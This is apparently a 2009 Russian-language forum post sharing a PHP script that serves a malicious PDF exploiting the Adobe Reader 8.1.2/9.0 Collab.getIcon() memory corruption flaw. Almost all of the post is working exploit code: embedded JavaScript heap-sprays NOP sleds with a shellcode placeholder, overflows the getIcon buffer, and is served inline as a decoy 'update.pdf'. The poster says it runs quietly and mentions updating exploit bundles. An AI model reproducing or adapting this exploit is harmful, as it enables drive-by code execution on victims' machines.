Adobe Acrobat Reader 8.1.2 and 9.0 getIcon() Memory Corruption Exploit
19 мая, 2009
Цель: Adobe Acrobat Reader
Воздействие: Выполнение произвольного кода
накалякал кодес, решил выложить... работает тихо, без зависаний
обновляем связочки
19 мая, 2009
Цель: Adobe Acrobat Reader
Воздействие: Выполнение произвольного кода
накалякал кодес, решил выложить... работает тихо, без зависаний
обновляем связочки
Код:
<?php
error_reporting(0);
$pdf = "%PDF-1.3
%????
1 0 obj
<</OpenAction <</JS (this." . $name . "\(\))
/S /JavaScript
>>
/Threads 2 0 R
/Outlines 3 0 R
/Pages 4 0 R
/ViewerPreferences <</PageDirection /L2R
>>
/PageLayout /SinglePage
/AcroForm 5 0 R
/Dests 6 0 R
/Names 7 0 R
/Type /Catalog
>>
endobj
2 0 obj
[]
endobj
3 0 obj
<</Count 0
/Type /Outlines
>>
endobj
4 0 obj
<</Resources 8 0 R
/Kids [9 0 R]
/Count 1
/Type /Pages
>>
endobj
5 0 obj
<</Fields []
>>
endobj
6 0 obj
<<>>
endobj
7 0 obj
<</JavaScript 10 0 R
>>
endobj
8 0 obj
<</ProcSet [/PDF /Text /ImageB /ImageC /ImageI]
>>
endobj
9 0 obj
<</Rotate 0
/Parent 4 0 R
/Resources 8 0 R
/TrimBox [0 0 595.28000 841.89000]
/MediaBox [0 0 595.28000 841.89000]
/pdftk_PageNum 1
/Contents 11 0 R
/Type /Page
>>
endobj
10 0 obj
<</Names [(New_Script) 12 0 R]
>>
endobj
11 0 obj
<</Length 31
>>
stream
0 0 595.28000 841.89000 re W n
endstream
endobj
12 0 obj
<</JS 13 0 R
/S /JavaScript
>>
endobj
13 0 obj
<</Length %LENGTH%
>>
stream
";
$script = 'function spary() {
var shellcode = unescape("тут шелкодик");
garbage = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090") + shellcode;
nopblock = unescape("%u9090%u9090");
headersize = 10;
acl = headersize+garbage.length;
while (nopblock.length<acl) nopblock+=nopblock;
fillblock = nopblock.substring(0, acl);
block = nopblock.substring(0, nopblock.length-acl);
while(block.length+acl<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<180;i++) memory[i] = block + garbage;
var buffersize = 4012;
var buffer = Array(buffersize);
for (i=0; i<buffersize; i++)
{
buffer[i] = unescape("%0a%0a%0a%0a");
}
Collab.getIcon(buffer+"_N.bundle");
}
spary();';
$len = strlen($script);
$pdf .= $script;
$pdf .= "
endstream
endobj
14 0 obj
<</Creator (Scribus 1.3.3.12)
/Title <>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (2008312053854)
/CreationDate (2008312053854)
>>
endobj
xref
0 15
0000000000 65535 f
0000000015 00000 n
0000000261 00000 n
0000000279 00000 n
0000000324 00000 n
0000000397 00000 n
0000000428 00000 n
0000000448 00000 n
0000000487 00000 n
0000000553 00000 n
0000000731 00000 n
0000000781 00000 n
0000000862 00000 n
0000000909 00000 n
0000004186 00000 n
trailer
<</Info 14 0 R
/Root 1 0 R
/Size 15
>>
startxref
4374
%%EOF
";
$pdf = str_replace("Length %LENGTH%","Length ".$len,$pdf);
header("Accept-Ranges: bytes\r\n");
header("Content-Length: ".strlen($pdf)."\r\n");
header("Content-Disposition: inline; filename=update.pdf");
header("\r\n");
header("Content-Type: application/pdf\r\n\r\n");
die($pdf);
?>